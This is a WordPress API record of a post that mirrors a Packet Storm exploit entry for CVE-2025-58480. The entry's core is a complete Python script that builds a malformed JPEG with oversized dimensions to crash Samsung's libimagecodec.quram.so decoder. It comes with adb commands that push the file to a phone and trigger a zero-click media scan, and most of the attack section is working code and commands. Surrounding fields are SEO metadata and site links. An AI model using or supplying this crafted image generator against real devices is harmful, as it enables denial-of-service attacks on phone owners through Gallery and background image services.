{"id":38142,"date":"2026-01-29T10:37:37","date_gmt":"2026-01-29T10:37:37","guid":{"rendered":"http:\/\/localhost\/?p=38142"},"modified":"2026-01-29T10:37:37","modified_gmt":"2026-01-29T10:37:37","slug":"samsung-libimagecodecquramso-buffer-overflow-denial-of-service","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38142","title":{"rendered":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567"},"content":{"rendered":"

{“lastseen”:”2026-01-29T16:31:00″,”description”:”This proof of concept demonstrates a denial of service vulnerability in Samsung’s libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large image dimensions height 65535, width 2862 in the SOF0 marker, the…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:214567″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-58480″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung libimagecodec.quram.so Malformed JPEG Triggers Buffer Overflow |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.samsung.com\/us\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213368\/ \\u0026 CVE-2025-58480\\n \\n [+] Summary : This proof-of-concept demonstrates a denial-of-service vulnerability in Samsung\u2019s libimagecodec.quram.so JPEG decoder. \\n By crafting a structurally valid JPEG file with maliciously large image dimensions (height 65535, width 2862) in the SOF0 marker, \\n \\t\\t\\t\\t the decoder performs unsafe size calculations during image parsing. This can lead to integer overflow or incorrect memory allocation, \\n \\t\\t\\t\\t resulting in a crash when the image is processed by Samsung Gallery or background services such as IPservice. \\n The PoC relies on minimal scan data and standard JPEG markers to pass initial validation, triggering the failure \\n \\t\\t\\t\\t before full decoding occurs. The impact is a crash (DoS); no remote code execution is demonstrated.\\n \\n [+] Testing steps :\\n \\n # 1. Create a PoC file : python3 poc_cve_2025_58480.py poc.jpg\\n \\n # 2. Move it to the target machine : adb push poc.jpg \/storage\/emulated\/0\/DCIM\/\\n \\n # 3. Run a media scan (for 0-click exploits)\\n \\n adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/poc.jpg\\n \\n # 4. Monitor the logs (to see the cracking)\\n adb logcat | grep -E \\”(SIGSEGV|libimagecodec|FATAL)\\”\\n \\n [+] POC :\\n \\n #!\/usr\/bin\/env python3\\n \\n import struct\\n import sys\\n \\n def create_malformed_jpeg(output_path):\\n \\n soi = b’\\\\xFF\\\\xD8’\\n \\n app0 = b’\\\\xFF\\\\xE0′ + struct.pack(‘\\u003eH’, 16) + b’JFIF\\\\x00\\\\x01\\\\x01\\\\x00\\\\x00\\\\x01’\\n \\n dqt_data = b”\\n for i in range(2): \\n dqt_data += b’\\\\xFF\\\\xDB’ + struct.pack(‘\\u003eH’, 67) \\n dqt_data += bytes([i]) \\n \\n dqt_data += bytes([1]) * 64\\n \\n dht = (b’\\\\xFF\\\\xC4′ + struct.pack(‘\\u003eH’, 29) + \\n b’\\\\x00′ + # Table ID (0 for DC luminance)\\n b’\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′ + # BITS\\n b’\\\\x00′ + # HUFFVAL (minimal)\\n b’\\\\xFF\\\\xC4′ + struct.pack(‘\\u003eH’, 29) + \\n b’\\\\x10′ + # Table ID (16 for AC chrominance)\\n b’\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00′ + \\n b’\\\\x00′)\\n \\n height = 65535 \\n width = 2862 \\n \\n sof0 = (b’\\\\xFF\\\\xC0′ + \\n struct.pack(‘\\u003eH’, 17) + \\n b’\\\\x08′ + \\n struct.pack(‘\\u003eH’, height) + \\n struct.pack(‘\\u003eH’, width) + \\n b’\\\\x03′ + \\n \\n \\n b’\\\\x01′ + \\n b’\\\\x11′ + \\n b’\\\\x00′ + \\n \\n b’\\\\x02′ + \\n b’\\\\x11′ + \\n b’\\\\x01′ + \\n \\n b’\\\\x03′ + \\n b’\\\\x11′ + \\n b’\\\\x01′) \\n \\n sos = (b’\\\\xFF\\\\xDA’ + struct.pack(‘\\u003eH’, 12) + \\n b’\\\\x03′ + \\n b’\\\\x01\\\\x00′ + \\n b’\\\\x02\\\\x11′ + \\n b’\\\\x03\\\\x11′ + \\n b’\\\\x00\\\\x3F\\\\x00′) \\n \\n compressed_data = b”\\n \\n for _ in range(10):\\n \\n compressed_data += b’\\\\xA0’\\n \\n compressed_data += b’\\\\x00’\\n \\n eoi = b’\\\\xFF\\\\xD9’\\n \\n jpeg_data = (soi + app0 + dqt_data + dht + sof0 + sos + \\n compressed_data + eoi)\\n \\n with open(output_path, ‘wb’) as f:\\n f.write(jpeg_data)\\n \\n print(f\\”[+] Malformed JPEG created: {output_path}\\”)\\n print(f\\”[+] Dimensions: {width} x {height}\\”)\\n print(f\\”[+] File size: {len(jpeg_data)} bytes\\”)\\n print(\\”[+] Expected behavior: Crash in libimagecodec.quram.so\\”)\\n return True\\n \\n def main():\\n if len(sys.argv) != 2:\\n print(f\\”Usage: {sys.argv[0]} \\u003coutput_file.jpg\\u003e\\”)\\n sys.exit(1)\\n \\n output_file = sys.argv[1]\\n \\n if not output_file.lower().endswith((‘.jpg’, ‘.jpeg’)):\\n print(\\”[!] Warning: Output file should have .jpg or .jpeg extension\\”)\\n \\n try:\\n create_malformed_jpeg(output_file)\\n print(\\”\\\\n[+] PoC created successfully.\\”)\\n print(\\”[+] To test on Samsung Galaxy S24 Ultra (One UI 8.0):\\”)\\n print(\\” 1. adb push poc.jpg \/storage\/emulated\/0\/DCIM\/\\”)\\n print(\\” 2. adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/poc.jpg\\”)\\n print(\\” 3. Open in Samsung Gallery or wait for IPservice to process\\”)\\n \\n except Exception as e:\\n print(f\\”[-] Error creating PoC: {e}\\”)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214567″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214567\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-29T16:31:00″,”description”:”This proof of concept demonstrates a denial of service vulnerability in Samsung’s libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-38142","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38142\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-29T16:31:00″,”description”:”This proof of concept demonstrates a denial of service vulnerability in Samsung’s libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38142\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-29T10:37:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \\\/ Denial of Service_PACKETSTORM:214567\",\"datePublished\":\"2026-01-29T10:37:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142\"},\"wordCount\":909,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38142#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142\",\"name\":\"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \\\/ Denial of Service_PACKETSTORM:214567 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-29T10:37:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38142\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38142#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \\\/ Denial of Service_PACKETSTORM:214567\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38142","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567 - zero redgem","og_description":"{“lastseen”:”2026-01-29T16:31:00″,”description”:”This proof of concept demonstrates a denial of service vulnerability in Samsung’s libimagecodec.quram.so JPEG decoder. By crafting a structurally valid JPEG file with maliciously large...","og_url":"https:\/\/zero.redgem.net\/?p=38142","og_site_name":"zero redgem","article_published_time":"2026-01-29T10:37:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38142#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38142"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567","datePublished":"2026-01-29T10:37:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38142"},"wordCount":909,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38142#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38142","url":"https:\/\/zero.redgem.net\/?p=38142","name":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-29T10:37:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38142#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38142"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38142#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Samsung libimagecodec.quram.so Buffer Overflow \/ Denial of Service_PACKETSTORM:214567"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38142"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38142\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}